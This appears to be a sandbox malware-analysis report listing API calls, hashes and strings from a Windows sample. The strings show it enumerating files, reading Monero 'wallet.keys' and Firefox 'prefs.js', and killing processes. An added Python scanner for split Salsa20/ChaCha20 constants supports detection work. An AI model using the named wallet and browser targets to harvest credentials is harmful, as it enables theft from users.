                                    • API String ID: 180737720-4073750446
                                    • Opcode ID: 759c142da621ad2b3dea42683bf313398a21e531c315a4fc98212b3f4c70c4d6
                                    • Instruction ID: 9fd38a40b503fc090b723c5a3d9f1cc79cc6897c8095d4ce2fff840dde8afc8f
                                    • Opcode Fuzzy Hash: 759c142da621ad2b3dea42683bf313398a21e531c315a4fc98212b3f4c70c4d6
                                    • Instruction Fuzzy Hash: 795168B1514218ABCF24EBB0DC45EEAB37DBB54301F40468CB61996450DB74AB858F94
                                    APIs
                                    • wsprintfA.USER32 ref: 0068EE3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0068EE55
                                    • StrCmpCA.SHLWAPI(?,006A1630), ref: 0068EEAB
                                    • StrCmpCA.SHLWAPI(?,006A1634), ref: 0068EEC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0068F3AE
                                    • FindClose.KERNEL32(000000FF), ref: 0068F3C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: 05a19910b2b5d37587af196351ae063610d6af0304a989ea49d9eee2b8437da8
                                    • Instruction ID: 559645850c4c43c5ce5206b5afdf32f09ecf2d9fa9e37ce335453ac376bbe67c
                                    • Opcode Fuzzy Hash: 05a19910b2b5d37587af196351ae063610d6af0304a989ea49d9eee2b8437da8
                                    • Instruction Fuzzy Hash: 56E10E729111189ADF94FBA0CCA2EEE737EAF54300F4045DDB40A66496EE306F89CF95
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                    • API String ID: 0-1562099544
                                    • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                    • Instruction ID: 862c1134105a4a49251684aee66fd2b1eb39c1bb18a96eed0b4833fdd5bf4e89
                                    • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                    • Instruction Fuzzy Hash: ABE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
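The string list for this function shows the fragments `expa`, `nd 3`, `2-by`, `te k` and `expand 32-by` rather than one string. `expand 32-byte k` is the 16-byte setup constant (sigma) shared by Salsa20 and ChaCha20, and a compiler that loads it as four 32-bit immediates leaves exactly these 4-byte pieces in the code section, which is why a plain search for the full constant can miss a key-setup routine. The scanner below is an added example, not code from the report or from the sample: it searches a memory dump for the constant both contiguously and as four nearby immediates, for the 256-bit (`expand 32-byte k`) and 128-bit (`expand 16-byte k`) variants. The dump bytes are constructed, the 64-byte clustering window is a heuristic, and a hit identifies a Salsa20/ChaCha20 implementation, which legitimate software also contains, not malware by itself.

```python
"""Find the Salsa20/ChaCha20 setup constant in a memory dump, contiguous or split
into the four 32-bit immediates a compiler emits when it builds the state in place.

Added example for the record above; the dump bytes are constructed and the
clustering window is a heuristic chosen for this example.
"""
from dataclasses import dataclass
from typing import Dict, List

# 16-byte constants that occupy state words 0..3 in Salsa20 and ChaCha20.
CONSTANTS = {
    "sigma": b"expand 32-byte k",  # 256-bit key
    "tau": b"expand 16-byte k",    # 128-bit key
}


@dataclass
class Hit:
    name: str     # "sigma" or "tau"
    kind: str     # "contiguous" or "split"
    offset: int   # lowest offset of the match
    span: int     # bytes from first to last fragment (16 for contiguous)


def split_words(const: bytes) -> List[bytes]:
    """The four little-endian words; as x86 imm32 they appear byte-for-byte in code."""
    return [const[i:i + 4] for i in range(0, 16, 4)]


def find_all(buf: bytes, needle: bytes) -> List[int]:
    """All (possibly overlapping) offsets of needle in buf."""
    out, i = [], buf.find(needle)
    while i != -1:
        out.append(i)
        i = buf.find(needle, i + 1)
    return out


def scan(buf: bytes, window: int = 64) -> List[Hit]:
    hits: List[Hit] = []
    for name, const in CONSTANTS.items():
        contiguous = find_all(buf, const)
        hits += [Hit(name, "contiguous", off, 16) for off in contiguous]
        words = split_words(const)
        positions: Dict[bytes, List[int]] = {w: find_all(buf, w) for w in words}
        # Anchor on word 0 and require words 1..3 within `window` bytes, in any
        # order; skip anchors that are simply the start of a contiguous match.
        for anchor in positions[words[0]]:
            if anchor in contiguous:
                continue
            found = [anchor]
            for w in words[1:]:
                near = [p for p in positions[w] if abs(p - anchor) <= window]
                if not near:
                    break
                found.append(min(near, key=lambda p: abs(p - anchor)))
            else:
                lo, hi = min(found), max(found) + 4
                hits.append(Hit(name, "split", lo, hi - lo))
    return sorted(hits, key=lambda h: h.offset)


def build_sample() -> bytes:
    """Constructed dump: a split key-setup sequence, a contiguous copy and a decoy."""
    filler = bytes(range(256)) * 2  # 512 bytes containing none of the fragments
    # mov dword [ebp+disp8], imm32 encodes as C7 45 <disp8> <imm32>; the compiler
    # is free to order the four stores and interleave unrelated instructions.
    split = (b"\xC7\x45\xF0" + b"2-by"
             + b"\x8B\x4D\x08"              # mov ecx, [ebp+8]
             + b"\xC7\x45\xE4" + b"expa"
             + b"\xC7\x45\xE8" + b"nd 3"
             + b"\x89\x08"                  # mov [eax], ecx
             + b"\xC7\x45\xEC" + b"te k")
    decoy = b"\xC7\x45\xE4" + b"expa"      # 'expa' with no partner words nearby
    return filler + split + filler + CONSTANTS["sigma"] + filler + decoy + filler


if __name__ == "__main__":
    for hit in scan(build_sample()):
        print(hit)
```

On the constructed dump the scanner reports the split sequence once (spanning the 30 bytes from the first to the last immediate) and the contiguous copy once, and ignores the lone `expa` decoy; a YARA rule built the same way would need the four fragments as separate strings with a distance condition rather than the full 16-byte literal.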
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006A16B0,006A0D97), ref: 0068F81E
                                    • StrCmpCA.SHLWAPI(?,006A16B4), ref: 0068F86F
                                    • StrCmpCA.SHLWAPI(?,006A16B8), ref: 0068F885
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0068FBB1
                                    • FindClose.KERNEL32(000000FF), ref: 0068FBC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: f76a51f591ec85fc0b5a4ec5f44b592fe8399ec490fe1d1b9b82de97c3623378
                                    • Instruction ID: 3e3b3712fb4612c45eff327bac116b672fc4f57f70f75cdba7eae19268a674f3
                                    • Opcode Fuzzy Hash: f76a51f591ec85fc0b5a4ec5f44b592fe8399ec490fe1d1b9b82de97c3623378
                                    • Instruction Fuzzy Hash: 94B14071A141089BCF64FFA0DD96AED73BEAF55300F0046ACA40A5A595EF306B48CB96
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006A523C,?,?,?,006A52E4,?,?,00000000,?,00000000), ref: 00681963
                                    • StrCmpCA.SHLWAPI(?,006A538C), ref: 006819B3
                                    • StrCmpCA.SHLWAPI(?,006A5434), ref: 006819C9
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00681D80
                                    • DeleteFileA.KERNEL32(00000000), ref: 00681E0A
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00681E60
                                    • FindClose.KERNEL32(000000FF), ref: 00681E72
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: a3816504e9ee844ce236c0b9bf527d8a3d60333d6074ed86668c10582ca96814
                                    • Instruction ID: 5ebedb0f09bcf7a5d75cdc6d799df36e829873972918e5d03cb4a237086defa7
                                    • Opcode Fuzzy Hash: a3816504e9ee844ce236c0b9bf527d8a3d60333d6074ed86668c10582ca96814
                                    • Instruction Fuzzy Hash: 111219719101189BCF59FBA0CCA6AFE73BEAF54300F4045DDA10A66495EF306B89CFA5
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,006A0C32), ref: 0068DF5E
                                    • StrCmpCA.SHLWAPI(?,006A15C0), ref: 0068DFAE
                                    • StrCmpCA.SHLWAPI(?,006A15C4), ref: 0068DFC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0068E4E0
                                    • FindClose.KERNEL32(000000FF), ref: 0068E4F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2325840235-1173974218
                                    • Opcode ID: 55e94f120ce2e278b496eb8ad939124d0fd00d6fe66030d33c58350efd1d4e26
                                    • Instruction ID: 91f7e15683a20dccab5505270bf362afa0fd17beae9c6a46d2dae42f12391f1f
                                    • Opcode Fuzzy Hash: 55e94f120ce2e278b496eb8ad939124d0fd00d6fe66030d33c58350efd1d4e26
                                    • Instruction Fuzzy Hash: FCF1BB719141189ACF55FBA0CCA5EEEB3BEAF15300F4046DDA00A66495EF306F89CF99
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006A15A8,006A0BAF), ref: 0068DBEB
                                    • StrCmpCA.SHLWAPI(?,006A15AC), ref: 0068DC33
                                    • StrCmpCA.SHLWAPI(?,006A15B0), ref: 0068DC49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0068DECC
                                    • FindClose.KERNEL32(000000FF), ref: 0068DEDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: bcdfba6eaa6ebe1f83335c6fba4ac2371723a0cc78ae0728a87878f1dd5ee2c3
                                    • Instruction ID: 03859d9b23634546cb73d5405bc3b1ccfb9ecf4680802f047b2f8af3d5e7305e
                                    • Opcode Fuzzy Hash: bcdfba6eaa6ebe1f83335c6fba4ac2371723a0cc78ae0728a87878f1dd5ee2c3
                                    • Instruction Fuzzy Hash: 79913372A142089BCF54FBB0ED969ED737EAF84300F00465CF90656585EE349B08CBEA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: C:]$1ZWt$2um{$72Jv$Jl}u$Z}'y$m:{$g?y$s}
                                    • API String ID: 0-1974508172
                                    • Opcode ID: 99bde0ec7adf7c896b05245f573f7423d06ddafc4026c59ede11df5605a36900
                                    • Instruction ID: 4361e02e462bb51bd0f7d51e764c5ed39776dc665afa7ab724814610f57bd144
                                    • Opcode Fuzzy Hash: 99bde0ec7adf7c896b05245f573f7423d06ddafc4026c59ede11df5605a36900
                                    • Instruction Fuzzy Hash: 3BA216F360C2049FE7047E2DEC8567AFBE9EB94220F1A463DEAC5C3744E97598018697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: +RY{$/RY{$?WW$P^z$\<V~$b}^$uz|$vw$O_{
                                    • API String ID: 0-4230725404
                                    • Opcode ID: 9fcf9ae4e0cc157272786ad7ac179a6bdf5e1c46ab1ccd96890d96367e6131df
                                    • Instruction ID: 71e3e184351472c875e07f6fb73fe0e3df003532b570de311aff0deed0295a05
                                    • Opcode Fuzzy Hash: 9fcf9ae4e0cc157272786ad7ac179a6bdf5e1c46ab1ccd96890d96367e6131df
                                    • Instruction Fuzzy Hash: A0A236F3A0C3049FE3046E29EC8567ABBE5EF94720F164A3DE6C4C7744EA3598418697
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00699905
                                    • Process32First.KERNEL32(00689FDE,00000128), ref: 00699919
                                    • Process32Next.KERNEL32(00689FDE,00000128), ref: 0069992E
                                    • StrCmpCA.SHLWAPI(?,00689FDE), ref: 00699943
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0069995C
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0069997A
                                    • CloseHandle.KERNEL32(00000000), ref: 00699987
                                    • CloseHandle.KERNEL32(00689FDE), ref: 00699993
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
